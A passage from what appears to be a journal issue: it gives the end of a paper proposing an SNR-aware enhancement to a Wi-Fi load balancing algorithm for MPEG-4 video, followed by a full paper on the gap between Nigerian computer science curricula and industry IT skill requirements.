Figures 7, 8 and 9 also show a correlation between SNR1 and SNR2: the bit rate falls once SNR2 = SNR1/2, even though the APs are still balanced (SNR2 = 40 dB for SNR1 = 80 dB; SNR2 = 30 dB for SNR1 = 60 dB; SNR2 = 20 dB for SNR1 = 40 dB).
Fig. 10. Packet jitter variation
Fig. 11. Frame end to end delay variation
Fig. 12. Frame jitter variation
[Fig. 8 plot: bit rate = f(SNR, Load); unbalanced APs vs. LBA; SNR 20–60 dB]

[Fig. 9 plot: bit rate = f(SNR, Load); unbalanced APs vs. LBA; SNR 20–40 dB]
[Fig. 10 plot: packet jitter = f(SNR, Load); unbalanced APs vs. LBA; SNR 20–80 dB]

[Fig. 11 plot: frame end-to-end delay = f(SNR, Load); unbalanced APs vs. LBA; SNR 20–80 dB]

[Fig. 12 plot: frame jitter = f(SNR, Load); unbalanced APs vs. LBA; SNR 20–80 dB]
Fig. 13. Frame jitter variation
Fig. 14. PSNR variation
In Figure 10, we applied LBA at a signal-to-noise ratio of 80 dB, and the packet jitter decreased from 18 ms to 13 ms. However, the jitter rises again as the SNR drops (<= 40 dB), reaching 26 ms, which is greater than the initial value (18 ms) measured when the APs were unbalanced.
As Figure 11 shows, applying LBA considerably decreases the frame end-to-end delay, from 0.13 s to 0.096 s. Although the access points are balanced, the end-to-end delay rises to 0.17 s once the SNR becomes weak (<= 40 dB) compared with the initial value (80 dB).
In Figure 12, applying LBA improves the frame jitter, which decreases from 131 ms to 96 ms. But the value measured in Figure 13 (176 ms) once the SNR became weak (40 dB) is worse than the value obtained at a strong SNR (80 dB) when the APs were still unbalanced (131 ms).
Figure 14 demonstrates that LBA enhances the users' video quality: at SNR = 70 dB, applying LBA increases the PSNR considerably. However, once the signal strength drops to a medium level (30 dB), the video quality degrades and the PSNR falls to 14 dB, even though the APs are balanced.
In conclusion, the previous figures illustrate an application of the load balancing algorithm and its efficiency. LBA improves the QoS parameters (bit rate, jitter, end-to-end delay, etc.). However, the stations are mobile and signal strengths vary from one mobile station to another, so applying LBA is not always the best way to improve QoS: the quality of service degrades when the SNR becomes weak, even when the load is distributed correctly. We have thus shown experimentally the importance of the SNR parameter when applying LBA. Moving a mobile station from an overloaded AP to an under-loaded AP does not necessarily improve QoS; the second AP's SNR must not be less than half of the first AP's SNR.
VI. CONTRIBUTION TO LBA ENHANCEMENT
LBA exposes a weakness at the boundary between its selection policy and its distribution policy. The selection policy chooses a mobile station to disconnect from an overloaded AP and connect to an under-loaded AP; the distribution policy then checks the load balancing criterion β and moves the selected mobile. The selection policy, however, ignores the signal-to-noise ratio (SNR) of the under-loaded and overloaded APs involved. An under-loaded AP can have poor physical characteristics, and hence a weak SNR, even though it has more spare capacity than the other APs. So although the APs end up balanced, QoS degrades when the new under-loaded AP, or its associated stations, are farther away than the old overloaded AP: the AP's channel suffers and the probability of packet loss becomes very high. We therefore improve the load balancing algorithm by integrating the SNR parameter into the selection policy (Figure 15).
Fig. 15. LBA enhancement
Our contribution to enhancing LBA is the following: when LBA decides to disconnect a mobile from one AP and connect it to another, it must take the SNR of the new AP into account. The new signal-to-noise ratio must not be less than half the SNR of the old AP, even if the new AP is under-loaded.
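The enhanced selection policy can be sketched as follows. This is an illustrative reconstruction of the rule just stated, with invented AP names and dB values; only the "new SNR greater than half the old SNR" test comes from the paper.

```python
# Sketch of the proposed LBA enhancement: before handing a station from an
# overloaded AP to an under-loaded one, accept the move only if the candidate
# AP's SNR exceeds half the current AP's SNR. Values are illustrative.

def accept_handover(current_snr_db, candidate_snr_db):
    """SNR check inserted into the selection policy (next SNR > current SNR / 2)."""
    return candidate_snr_db > current_snr_db / 2

def select_target_ap(current_snr_db, underloaded_aps):
    """Pick the best under-loaded AP that passes the SNR check, else stay put.

    underloaded_aps maps AP name -> SNR (dB) as seen by the mobile station.
    Returns None when no candidate is safe, i.e. the distribution policy
    should not run and the station keeps its current association.
    """
    safe = {ap: s for ap, s in underloaded_aps.items()
            if accept_handover(current_snr_db, s)}
    if not safe:
        return None
    return max(safe, key=safe.get)

# Current AP at 80 dB: AP2 at 30 dB fails the 40 dB bar; AP3 at 45 dB passes.
print(select_target_ap(80, {"AP2": 30, "AP3": 45}))  # AP3
print(select_target_ap(80, {"AP2": 30}))             # None -- no safe target
```

The `None` branch is what distinguishes this policy from plain LBA: an under-loaded AP with a weak signal is simply excluded, matching the conclusion of the second experiment.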
[Fig. 13 plot: frame jitter = f(SNR, Load); unbalanced APs vs. LBA; SNR 20–40 dB]

[Fig. 14 plot: PSNR = f(SNR, Load); unbalanced APs vs. LBA; SNR 30 and 70 dB]
[Fig. 15 flowchart: the selection policy computes the candidate SNR; if next SNR > current SNR / 2 (Yes), the distribution policy runs; otherwise (No), the selection is repeated.]
VII. CONCLUSION AND FUTURE WORKS
In this paper, we have proposed a contribution to improving the QoS of MPEG-4 video transmission over IEEE 802.11. We used an experimental platform (IP camera, APs, mobile stations, etc.) to conduct two experiments. First, we studied the variation of QoS parameters (bit rate, jitter, end-to-end delay, etc.) as functions of the SNR and the load. Second, we analyzed the performance of a load balancing algorithm in IEEE 802.11. These experiments yielded several results: first, QoS improves with the signal-to-noise ratio, but the load of the APs also affects QoS in IEEE 802.11; second, LBA works better when it takes the SNR of the available APs into account. Finally, we proposed a new approach based on the SNR at LBA execution time.
Future work should focus on new approaches and primitives that can be introduced to enhance the QoS. We will study the implementation of a load balancing algorithm with the SNR integrated into the selection policy, using a network simulator such as OPNET or NS to simulate and test these strategies.
REFERENCES
[1] S. Sheu and C. Wu, "Dynamic Load Balance Algorithm (DLBA) for IEEE 802.11 Wireless LAN", Tamkang Journal of Science and Engineering, Vol. 2, No. 1, pp. 45-52, 1999.
[2] I. Papanikos and M. Logothetis, "A study on dynamic load balance for IEEE 802.11b wireless LAN", 8th International Conference on Advances in Communication and Control, Greece, 2001.
[3] A. Lindgren, A. Almquist, and O. Schelen, "Evaluation of quality of service schemes for IEEE 802.11 wireless LANs", 26th Annual IEEE Conference on Local Computer Networks, Tampa, Florida, USA, pp. 348-351, 2001.
[4] V. Aleo, "Load Distribution in IEEE 802.11 Cells", Master of Science Thesis, KTH, Royal Institute of Technology, Sweden, 2003.
[5] H. Velayos, V. Aleo, and G. Karlsson, "Load Balancing in Overlapping Wireless Cells", IEEE International Conference on Communications, Paris, France, 2004.
[6] Q. Ni, L. Romdhani, and T. Turletti, "A Survey of QoS Enhancements for IEEE 802.11 Wireless LAN", Journal of Wireless Communications and Mobile Computing, Vol. 4, No. 5, pp. 547-566, 2004.
[7] O. Brickley, S. Rea, and D. Pesch, "Load balancing for QoS enhancement in IEEE 802.11e WLANs using cell breathing techniques", 7th IFIP International Conference on Mobile and Wireless Communications Networks, Morocco, 2005.
[8] M. Salhani, T. Divoux, and N. Krommenacker, "Etude de l'Adéquation des Ressources Physiques aux Besoins des Applications sans-fil : Proposition d'un algorithme d'équilibrage de charge dans les cellules IEEE 802.11", Rapport de DEA en génie informatique, Faculté des sciences et techniques, France, 2005.
[9] H. Al-Rizzo, M. Haidar, R. Akl, and Y. Chan, "Enhanced Channel Assignment and Load Distribution in IEEE 802.11 WLANs", IEEE International Conference on Signal Processing and Communications, pp. 768-771, 2007.
[10] I. Jabri, N. Krommenacker, A. Soudani, T. Divoux, and S. Nasri, "IEEE 802.11 Load Balancing: An Approach for QoS Enhancement", International Journal of Wireless Information Networks, Vol. 15, No. 1, pp. 16-30, 2008.
AUTHORS PROFILE
Salah HAMDI received his Teaching and Master degrees in computer science from the Upper Institute of Applied Sciences and Technology (ISSAT) of Sousse, Tunisia. He is currently a PhD student at the National Engineering School of Sfax (ENIS), Tunisia. His current research topics concern artificial intelligence and decision support; he focuses on the design of intelligent software for decision making in cardiology.
Adel SOUDANI received his PhD (2003) in Electronics and in Electrical Engineering, respectively from the University of Monastir, Tunisia, and the University Henri Poincaré Nancy I, France. He is currently an Assistant Professor at the Institute of Applied Sciences and Technology of Sousse. His research activity includes QoS management in real-time embedded systems and multimedia applications. He focuses mainly on protocol verification, implementation and performance evaluation for multi-constrained communication systems.
Rached TOURKI received the B.S. degree in Physics (Electronics option) from Tunis University in 1970, and the M.S. and Doctorat de 3ème cycle in Electronics from the Institut d'Electronique d'Orsay, Paris-South University, in 1971 and 1973 respectively. From 1973 to 1974 he served as a microelectronics engineer at Thomson-CSF. He received the Doctorat d'état in Physics from Nice University in 1979. Since then, he has been a professor of Microelectronics and Microprocessors in the Department of Physics at the Science Faculty of Monastir. Since 1999, he has been the Director of the Electronics & Microelectronics Lab.
ABSTRACT
This paper sets out to examine the skills gap between the industrial application of Information Technology and university academic programmes (curricula). It looks at some of the causes, considers probable solutions for bridging the gap, and suggests possible new roles for our universities and employers of labour. It also highlights strategies to remove the misalignment between university and industry. The central idea is to blend academic rigour with industrial relevance.
KEYWORDS
Skills gap, Industry, IT, Curriculum, University, Graduates, Government, Business.
1.0 INTRODUCTION
As Nigerian industries grow rapidly with the advancement of science and technology, an unprecedented demand for better graduates has been created. However, industry often criticizes existing university curricula for falling short of tackling its practical issues. For instance, industry expects universities to train its future employees in the latest technology and to sit at the centre of developing trends, yet many universities lack academic programmes suited to industry. This creates a gap between universities and industry that needs to be bridged by university academics and IT professionals. Industry is continually broadening, and its knowledge domain is becoming increasingly complex. Developing better university curricula therefore plays a significant role in bridging the gap between changing technology and employers' needs. Universities should provide a conducive learning environment and an industry-oriented curriculum that the business community perceives as meeting its IT requirements. Curricula are expected to be developed with the objective of producing skilled, employable graduates. Ching et al. (2000) state that employability rests in the knowledge and skills imparted to graduates through their education.
This paper therefore sets out to examine the skills gap between the industrial application of Information Technology and university academic programmes, to look at some of its causes, to consider probable solutions for bridging the gap, and to suggest possible new roles for our universities and employers of labour. The two sides, one producing and the other utilizing the workforce, need common ground so that their synergy results in an adequate supply of relevant personnel for all sectors of the economy.
Only when such a balance is in sight can we begin to tackle the issue of unemployment in society.
2.0 UNIVERSITY ACADEMIC PROGRAMME AND INDUSTRIAL APPLICATION OF IT
The subject of skills development is both timely and appropriate in view of the present global socio-economic challenges. The issue of the skills gap is particularly topical given the structural, academic, vocational and planning challenges that are currently peculiar to us. The world no longer debates the importance of education as a prerequisite for social and economic development, and nobody now questions the relationship between high academic attainment and the economic rewards that accrue from it. As the former President of the United States, Bill Clinton, once said: "We are living in a world where what you earn is a function of what you can learn" (US Dept. of Educ., 1995).
Exploration of the Gap Between Computer Science Curriculum and Industrial I.T Skills Requirements

Azeez Nureni Ayofe
Department of Maths & Computer Science,
College of Natural and Applied Sciences,
Fountain University, Osogbo,
Osun State, Nigeria.
E-mail address: nurayhn@yahoo.ca

Azeez Raheem Ajetola
Department of Maths & Computer Science,
College of Natural and Applied Sciences,
Fountain University, Osogbo,
Osun State, Nigeria.
E-mail address: ajeazeez@yahoo.com
If the world is to move out of the present economic doldrums, its abundant human resources need to be deployed effectively and efficiently, equipped with Information Technology-based processing skills, to manage its other natural resources and attain these developmental goals.
IT skills in every ramification translate into inventions, services, products, ideas, innovations and best practices that drive the wheel of progress and development. From a studied position, the development of any nation depends to a very large extent on the calibre, organization and technological skill of its human resources.
In addition, it is widely held that the knowledge, skills and resourcefulness of people are critical to sustaining economic and social development activities in a knowledge-based society. Given the growth of global IT networking and the dynamic investment climate in the world, the demand for knowledge workers with high levels of technical and soft skills can only increase. IT knowledge and networking skills are the arrowhead of the modern world of work: every aspect of work is now computerized, and only those who move with the tide will be successful.
However, the gap between what is taught at school and the skills required to perform on the job is so wide that a high percentage of young graduates are said to be unemployable for lack of the skills that would make them profitable to any employer. This state of affairs has persisted, especially in Africa, for so long that serious action is urgently needed to stem the tide and correct the malaise that is robbing nations of progress in many fields of endeavour.
3.0 A TYPICAL SCENARIO
Table 1 below shows the statistics of unemployed graduates in Malaysia, as obtained from http://educationmalaysia.blogspot.com/2006/07/70-public-university-graduates-jobless.html and presented during a seminar in Malaysia on education in Malaysia.

Table 1. Statistics of unemployed graduates in Malaysia (source: http://educationmalaysia.blogspot.com/2006/07/70-public-university-graduates-jobless.html)
One of the contributors, Kian Ming, said: "I can fully understand 'Business Administration' or other management programmes as a degree course that many candidates opt for if they are not qualified for other subjects to study, and hence the high level of unemployability given the weaker pool of students. However, computer science is the highest contributor to the unemployed pool? Isn't that the next wave of growth overtaking
the country, whereby computer science graduates should be in high demand?"
Another participant in the same seminar, John Lee, said: "The answer as to why the Computer Science faculty seems to contribute the highest number of unemployed graduates to the market place, despite a clear shortage of skilled workers in the industry, is fairly obvious.
A survey conducted earlier indicated that as many as 30% of unemployed local graduates are computer science and information technology degree holders.
These skills are in obvious demand in the country; it is not a mismatch. The clear-cut issue in this case is that many of the local institutions of higher learning, both public and private, have failed to offer a sufficiently rigorous education to produce the necessary quality in the workforce which the industry requires."
Most importantly, as highlighted by Chris Chan, chief executive officer of The Media Shoppe, in the same seminar:
"... some local ICT graduates lacked fundamental technical skills and only had knowledge of basic software such as Microsoft Office (!)
The problem is largely either the poor ICT curriculum of many of our local universities/colleges, which doesn't seem to teach anything to our ICT students, or that these students shouldn't have been taking ICT courses in the first place."
4.0 WHAT IS A SKILL GAP?
A skill gap is a shortage in performance. It is the difference between what is required or expected and what we actually get. Put another way, a skill gap is the required performance minus the present performance (Adetokunbo, 2009). Hence it is also called the performance gap. It can occur in any field of work.
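The definition above is simple arithmetic, and can be sketched in a few lines of Python; the competency names and scores below are purely hypothetical, chosen only to illustrate the required-minus-present calculation:

```python
# Skill gap = required performance - present performance (per the definition above).
# The competencies and scores here are hypothetical illustrations, not survey data.
required = {"programming": 8, "documentation": 7, "project_management": 6}
present = {"programming": 5, "documentation": 3, "project_management": 2}

# A positive value is a shortfall that training would need to close.
skill_gap = {skill: required[skill] - present[skill] for skill in required}
print(skill_gap)
```

On these made-up numbers, the largest gaps fall in documentation and project management rather than in raw programming, mirroring the argument later in this paper that graduates' weakest skills are often the non-coding ones.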
Causes of the gap between the university degree in Computing and industrial IT skills
• The Computer Science curriculum is static in nature while its industrial application is dynamic.
• Universities are not ready to train and retrain their staff to keep up with the dynamic nature of the course because of the financial implications.
• Lukewarm attitude of lecturers towards presenting themselves for training and workshops that would expose them to the latest innovations in IT.
• Priority given by lecturers to research work rather than to lectures and workshops that would bring them up to date on the latest developments in IT.
• Lack of facilities to train both the lecturers and the students on new inventions.
4.1 UNIVERSITY ACADEMIC PROGRAMME
This, otherwise known as the ‘curriculum’, refers to the course offerings at an educational institution. Decisions about what a school should teach are usually made by school administrators and faculty and governed by university councils. In relation to Information Technology, the curriculum is widely viewed as too theoretical and outdated. The technical attributes and “know-how” expected of this programme are in a depleted state, far from satisfactory for application in the industrial realm.
Answers are continuously left unprovided when students (graduates) are faced with the reality question “WHAT CAN YOU DO?” in the labour market when they go out for an interview.
4.2 STUDENTS IN PERSPECTIVE
It is obvious that in university, students study the basics, that is, the underlying principles, which might not be adequate to develop a professional project for a demanding client. Students do not know what a use case is; they do not know how to prepare a professional SRS (Software Requirements Specification); they equally do not know about the WBS (Work Breakdown Structure). So how can they learn all these things to prepare themselves for a good, satisfying job and work?
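To make the artefacts just mentioned concrete, a use case is essentially a structured description of one interaction with a system. A minimal sketch in Python, with an entirely hypothetical ATM example (the field names follow common SRS practice, not any fixed standard):

```python
# A minimal, hypothetical use-case record of the kind graduates are expected
# to be able to write; the scenario and field names are illustrative only.
use_case = {
    "name": "Withdraw Cash",
    "actor": "Bank Customer",
    "precondition": "Customer holds a valid ATM card",
    "main_flow": [
        "Customer inserts card and enters PIN",
        "System validates PIN against the bank's records",
        "Customer selects the amount to withdraw",
        "System dispenses cash and prints a receipt",
    ],
    "postcondition": "Account balance is reduced by the withdrawn amount",
}

print(f"Use case '{use_case['name']}' has {len(use_case['main_flow'])} steps")
```

An SRS would collect many such use cases together with non-functional requirements, while a WBS would break the delivery of each one into schedulable work packages.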
They should not think that they know the ins and outs of software development the moment they get a degree certificate from the university. They must accept that they may know 10%, or that they merely heard about these terms during their student life. They should also educate their parents not to pressurize them immediately after graduation, but rather to cooperate with them as they learn and get ready for the right job.
Why can so many fresh IT or Computer Science graduates in India secure a job within six months of their graduation date? They set their minds on joining a good training institute for at least three months after graduation, where they learn the technology, communication skills and exposure to project management. This helps them a lot in approaching the big companies for a junior software developer post, as they learn the live scenario of a project cycle during their training period (Azeez, 2008). They know how to code (technology), how to document (communication) and how to prepare a release note (a bit of project management). This is what any company expects from any IT graduate from day one. Companies are happy recruiting them, as they no longer have to spend money and time training such graduates.
4.3 CAUSES OF THE UNIVERSITY-INDUSTRY GAP IN THE AREA OF INFORMATION TECHNOLOGY
Apart from skill obsolescence that occurs over time, there are other factors that cause these gaps. A major factor is the changing pattern of work in industries. Current trends in the world of work, such as globalization, commercialization, flexi-hours, deregulation, outsourcing, contract work, homework and freelancing, have led to marked changes in industry structure. New definitions, new meanings and new applications of knowledge drive all these changes. New technological discoveries have given rise to new industries and to a new structuring of work itself. New forms of work structure which are flexible, adaptable, less hierarchical and multi-skilled, and which encourage continuous learning, are becoming sources of competitive advantage in industries. International competition for jobs and workers has also intensified, leading to a global talent hunt for innovation-driven knowledge workers.
In addition, global organizations are finding themselves ill-equipped to compete in the 21st century because of the lack of the right skills in the fresh graduates employed in the labor market.
At a time when the global knowledge-based economy places an ever-growing premium on the talent, creativity and efficiency of the workforce, business leaders talk of a widening gap between the skills their organizations need to grow and the capabilities of their employees. Finding the right candidates to fill a growing list of vacant positions is the number one concern of business leaders today. Research shows that shifts in workforce demographics affect the availability of labor to fill high-skilled jobs. Ironically, skill gaps also result from technological advancement. In reality, therefore, organizations will always face some type of skill gap if the university curriculum does not adjust itself to the computerized economy.
Lack of proper skills in university students, poor re-skilling, poor facilities for IT skills development, lack of planning, lack of coordination, confusion, mismanagement, inefficient application of scarce resources, deficient value orientation and other failings have greatly contributed to putting our country in a very precarious job deficit. Information technology training facilities are few, uncoordinated and untargeted in the higher institutions. Before the current global economic crisis, the jobs deficit was already huge and unwieldy. The situation has now become even more critical.
A respondent in a recent research study commented on the lack of teaching staff and the administrative difficulties in updating university programme curricula for IT education. Lack of technical expertise, costly IT equipment, and the costly maintenance and replacement of equipment have been some of the major impediments.
Another major problem has been the schools’ inability to keep abreast of fast-changing developments in industry and technology.
It was established earlier that a gap exists between the subjects taught and the methods used to teach them, and the academic requirements at higher education institutions.
4.4 DIMENSIONS OF THE SKILL GAP
From the foregoing analysis, it becomes obvious that there will always be a gap between IT skills and the university degree in Computing, regardless of the operative economic system. The extent and life span of the gap depend on how fast universities adjust or update their curricula in response to structural changes, and on the magnitude, composition and time lag of government intervention in the labor market. Gaps therefore exist in various forms at the aggregate, sectoral and individual levels. Underlying this gap is the inadequacy of educational curricula, which are designed
without apparent regard for relevance to industrial application. Aside from this, there is some lop-sidedness in curriculum implementation. Frequent discontinuity in university programmes impacts directly on the quality of skills supplied. The short-duration practical exposure of students through SIWES (the Student Industrial Work Experience Scheme) is generally ineffective, because most higher institutions do not even have proper IT facilities.
4.5 CONSEQUENCES OF THE GAP
The persistent skills gap between the IT industries and universities has made dependence on the importation of skilled workers, with its attendant cost, inevitable (Adetokunbo, 2009).
The gap also results in a waste of human resources and, therefore, unemployment. For example, banks in many African countries usually purchase the software they use for transactional purposes from China or the United States of America. Big companies equally do the same for the smooth running of their day-to-day activities. This follows from the lack of reliable IT personnel in many parts of the world to take up the challenge. Inappropriately skilled labor is deprived of participation in the production process. This category of unemployed persons raises the level of unemployment, which in addition to its economic consequences also threatens the social stability of the country.
4.6 BRIDGING THE SKILLS GAP
What then can be done to bridge this gap? What kind of education is required in order to prepare our students for work in the industries? What changes need to be implemented in order to make university programmes a true preparation for work? What kind of programme would ensure that students possess the skills necessary to enable them to occupy the jobs currently taken by expatriates?
The answer to these questions evidently lies in exposing students to the high-level cognitive skills that are essential and required by industries. The following are some of the solutions that have been found to produce good results:
• Study IT Skills programme: This is normally either presented as a stand-alone programme or integrated into the subjects taught. The IT skills reinforced include self-learning, lifelong learning, research skills, time-management skills, critical-thinking skills, etc. These components have been found to be most effective when they are woven into the university curriculum rather than tackled as stand-alone subjects.
In bridging the gap and/or reforming education, many countries have encountered and addressed this issue by introducing a strong technological component to the university curriculum. This normally comes in many different forms; prevalent among them is offering students courses in IT, work attitude and work ethic, followed by a subsequent placement in industrial and commercial firms, where they get first-hand experience in a real work environment.
Successful programmes have been implemented in countries such as Australia, Canada, the United States and Britain. The success of such programmes in these countries is ensured by the existence of a huge industrial sector, which works in partnership with schools. Other countries have opted to establish training centers with workshops that give students real work experience. These training centers are normally set up, financed and managed by the private sector, and schools pay fees for their students to use them. Successful examples of this kind of programme can be seen in the BOCES program in New York State and the Chicago School-to-Work Program.
• Information Technology: This programme ensures that the student possesses adequate knowledge of IT and has the skills required to use it comfortably in his job. Knowledge and skills in IT are two components that have been found to be essential to both groups of students: those who join the workforce and those who opt for higher education.
Like every economic phenomenon, there are both supply and demand sides to issues relating to skills. A major source of the supply of skills is the educational system, defined as the totality of all formal educational institutions providing one form of skills development or another, ranging from basic and technical colleges to tertiary institutions comprising the various universities, polytechnics, monotechnics and other specialized institutions providing highly specialized skills.
The curricula or training manuals being implemented by these various institutions are developed either wholly by the
relevant coordinating commissions, such as the National Universities Commission (NUC) in the case of the universities and the National Board for Technical Education (NBTE) for the polytechnics, or in conjunction with international agencies such as the ILO. Suffice it to say that the major target of the educational system is to produce the skills required by the public and the organized private sector.
• Government and the organized private sector should also put in place arrangements for students of tertiary institutions to undergo short-term practical training in their chosen vocations through a Student Industrial Work Experience Scheme (SIWES) in Information Technology to enhance their knowledge in the field.
There is an emerging group of skills developers in Information and Communication Technology who can be placed between institutional and private developers. The emergence of this group is a response to developments in the ICT industry. Government should make promotional efforts towards regulating operations in the IT sector to avoid possible lop-sidedness and unhealthy practices that could mar the sector.
• Appropriate educational curricula: These must be designed and implemented by our institutions of learning, especially the technical colleges, polytechnics, monotechnics, universities and other specialized training institutions. The curricula, which must be relevant to the peculiarities of our situation, must most importantly address the current industrial demands, with the intention of making our university graduates of Computer Science relevant in the IT industry.
• There is a need to actively collaborate with and involve employers of labor in developing appropriate IT skills, to avoid the situation whereby people trained in a certain field cannot utilize their skills while the skills needed by employers are unavailable or grossly inadequate, leading either to the importation of foreign skills or to the outright incapacitation of the production process. Employers should be involved in all forms and levels of skills development, ranging from curriculum design and implementation to product/service research and development, funding, etc.
The need to institutionalize an Entrepreneurship Development Programme (EDP) and vocational training in the educational curricula is also imperative. Happily, some institutions have already started this. These subjects should be included among the contents of the compulsory general studies programme of all tertiary institutions’ IT curricula.
• Dialogue between the universities and employers of labor: An outline framework is needed for fostering the partnership between university and employer. While some areas of positive interaction between universities and employers already exist, in the form of training programmes and joint services geared at bridging the skill gaps, what is needed is a framework that addresses the chronic skill shortages in the labor market. This will no doubt entail an integrated strategy.
4.7 EMPLOYERS’ PERSPECTIVE
Employer-university interaction is currently characterized by the problem of a skills mismatch between what employers want and what universities can provide. The universities must therefore design a proper programme for the identification of employers’ skills requirements. For a result-oriented dialogue, employers, for their part, should do the following in order to attain the maximum benefits of bridging the current gap between the university curriculum of computer science and the IT skill requirements of industry:
Educational reform/curriculum: Educational reform is the most important area in which universities can aid in bridging this gap. The rapidly changing needs of employers and the labor market affect the curriculum, and adjusting the curriculum to those needs is therefore imperative. In framing an innovative curriculum relevant to employers’ needs for IT, universities must factor in the dynamics of modern trends, including ICT, globalization and technological change.
Technology has given rise not only to vast new industries but also to the restructuring of work itself. New forms of work structure which are flexible, adaptable, less hierarchical, multi-skilled and oriented towards continuous learning are becoming one of the major sources of competitive advantage of enterprises in the IT industries.
ICT literacy: Literacy in ICT must become an imperative of the educational process and be integrated into the curriculum at all levels of study to match the challenges and opportunities before us. Our objective is to empower every citizen with the IT skills they need for lifelong learning, both in the workplace and in private life. Our citizens
must have the technical skills, confidence and flexibility they need to adapt over the course of their lifetimes.
Industry’s needs: The drivers for the adoption of a productive dialogue with universities and a working partnership with industry on skill development in relation to the curriculum include knowing the industry’s skills requirements. What skills make a graduate more employable? In Computer Science, for example, a programmer may be expected to have mastery of languages and platforms such as Java, C++, C, DHTML, Oracle 10g, ASP and CGI, as well as C#, to be relevant and employable in the labour market.
Also, the following categories of professionals are expected to be able to perform the following functions:
1. A trained software engineer is expected to know how to create, maintain and modify computer software such as operating systems, communications software, utility programs, compilers and database handlers. They may also be able to evaluate new programming tools and techniques and analyze current software products (http/www./scientist/223113A.htm).
2. Computer engineers are involved in the installation, repair and servicing of computers and associated equipment, or peripherals. They may sometimes be described as information technology (IT) hardware technicians, service engineers or computer systems engineers (http/www./scientist/223113A.htm).
3. A hardware design engineer plans, designs, constructs and maintains the hardware equipment of computers. They may also monitor the development of hardware according to design, and carry out repairs and testing of computer equipment and peripherals (http/www./scientist/223113A.htm).
4. A network/systems engineer designs, installs, analyses and implements computer systems and networks. They may also make sure that the existing network is effective, and work out how it should evolve to meet the new requirements of the organization or business (http/www./scientist/223113A.htm).
The question now is: are these categories of professionals in Computing being trained to acquire the above skills? The answer is no, as can be clearly established from the analysis above. These skills are highly required to be taught in the university, but the reverse is the case.
Employability of graduates: In order to overcome persistent mismatches between graduate qualifications and the needs of the labor market, university programmes should be structured to enhance the employability of graduates directly and to offer broad support to the workforce more generally. ICT skills are portable if the skills acquired are transferable and can be used productively in different jobs and enterprises, in both the informal and the formal economy. Emphasis should be placed on entrepreneurship development to make our graduates well equipped for self-employment, innovation and creativity.
5.0 CHALLENGES TO UNIVERSITIES
The implications of many of the processes of globalization, knowledge redefinition, graduate employability, etc., are yet to be addressed by most universities. The scale of the challenge should not, however, be underestimated. Indeed, becoming a market-responsive organization requires a major change in university culture. It implies a strong sense of institutional purpose and redirection through redesigning the university academic curriculum to make the Computer Science graduate relevant in their chosen field.
Governance, management and leadership: Universities have historically been run as communities of scholars. Governance and management structures were collegial and committee-based; the Senate and the Council were representative and therefore large. Decision-making was, as a result, slow and naturally conservative. The emergence of a competitive mass market and a global higher education market is bringing this model of governance and management into question. If we are to have a catalytic relationship between the university and the global and dynamic world of industry, it is vital for universities to transform themselves into more dynamic institutions. In short, improved dialogue between universities and industries will not be readily achieved by top-down mechanisms at either the institutional or the regional level. There is thus the need for a flexible, responsive and agile
organization able to strike a working partnership with others.
5.1 BENEFITS TO THE UNIVERSITIES
The US experience of developing ‘knowledge workers’ is a good example demonstrating that universities play a vital role in driving growth in the modern economy. If this paper is fully read and digested, universities should get sufficient information on the skills needs of the industries to convince them of the urgency of curriculum refurbishment. Still, there are clear benefits that will accrue to them from this paper:
(1) They will have an enhanced role in industrial economic development.
(2) They will have earmarked funding for specific projects and research efforts from more industries.
(3) They will have flexible plans to access research funding through collaboration with industries.
(4) They will have access, through enlarged programmes, to real-world challenges in the workplace, and the satisfaction of contributing to marketplace success and growth ideas.
(5) They will have access to modern and sophisticated equipment and facilities in research centers funded by industries, jointly or otherwise.
(6) The need will create worthwhile incentives to help recruit, reward and retain research and faculty members and, most importantly, to train employable graduates.
5.2 BENEFITS TO BUSINESS AND INDUSTRIES
Some specific benefits of this paper also accrue to the industrial and business world. These include the following:
(1) There will be a steady and constant supply of graduate and postgraduate talent, skilled in the areas needed for employment.
(2) A pool of scientists and researchers will be available to undertake regular projects that will keep the industries abreast of innovations and discoveries.
(3) The availability of the latest research and technological inventions in the Nigerian marketplace would be guaranteed.
(4) Nigerian industrialists and academics will rub shoulders with their international counterparts in intellectual networking.
(5) The need for constant upgrading of professional knowledge becomes imperative for lecturers, staff and management alike.
The foregoing, in summary, underscores the need to build partnerships between universities and industries in Information Technology and other research-intensive sectors. Many multinationals have established alliances with academic institutions on specific initiatives covering faculty upgrading, consultancy, internships, curriculum revision workshops, research incubation, etc., aggregating the architects of the new global development in the educational sector.
Bridging the gap: student efforts.
In summary, students should find a good training company where they need not spend too much money and time but can learn more professionally, to augment their degree certificates. Fresh graduates must think and plan their careers before graduation: whether to become a programmer, business analyst, project manager or architect, or to prepare for a career in sales and marketing. They must think about the career path, and how to achieve their career goal within a certain number of years.
6.0 RECOMMENDATIONS AND CONCLUSION
Whatever format of education is agreed upon, the present researcher believes that there are some important parameters that need to be established. These parameters call for a paradigm shift from “instruction” to “learning” and from the “sellers’ market” to the “buyers’ market” (UNESCO, 2001). This shift also calls for a solid and sustained collaboration between education and the community. New partnerships would therefore need to be established, nurtured and
maintained. For effective implementation, we need to ensure the following:
• All universities should liaise with the relevant industries to receive industrial knowledge to augment classroom lectures.
• University lecturers should be motivated to attend local and international workshops on the latest IT innovations, with the intention of transferring that knowledge to their students.
• Universities should encourage students to register for certifications in IT.
• University education should be considered a “preparation for life” and should therefore cover a wider spectrum of courses that will be relevant in industry.
• The existing gap can also be corrected by reviewing the whole of the university (Information Technology) curriculum, and by preparing lecturers/instructors in line with the new curriculum, because implementation is another challenge when it comes to curriculum review.
• Retrain the existing teaching staff and administrators, and redefine/restructure teacher preparation programmes in keeping with the new requirements in IT.
• IT education is the minimum requirement for survival in today’s society and should therefore be open to universal access.
• Information Technology (IT) should be integrated into all subjects of the curriculum at the primary, secondary and tertiary levels.
• The colleges of education and the universities will have to change the way they prepare teachers in keeping with the new requirements. Both in-service and pre-service programmes have to be developed to serve this purpose.
• The preparation of teachers has to start as soon as possible, as this is a long-term process.
• We also have to fund our universities properly, quantitatively and qualitatively, so that our citizenry, including our labor force, may be sufficiently empowered with appropriate knowledge of 21st-century skills and the attitude for effective participation in a very competitive global IT society.
• Implement faculty improvement programmes to upgrade lecturers’ caliber and help them learn new technologies, based on the suggestions of leading software industrialists.
• Focus on industry-driven needs that will enhance the chances of university graduates, rather than laying too much emphasis on the basics, that is, the underlying principles of computing.
• The gap between industry-based applications and the university curriculum can also be bridged if the curriculum is structured in ways that concur with industrial applications.
• This can also be achieved if computer science courses related to application development, such as programming, are taught by professionals in such fields who are currently working in industry.
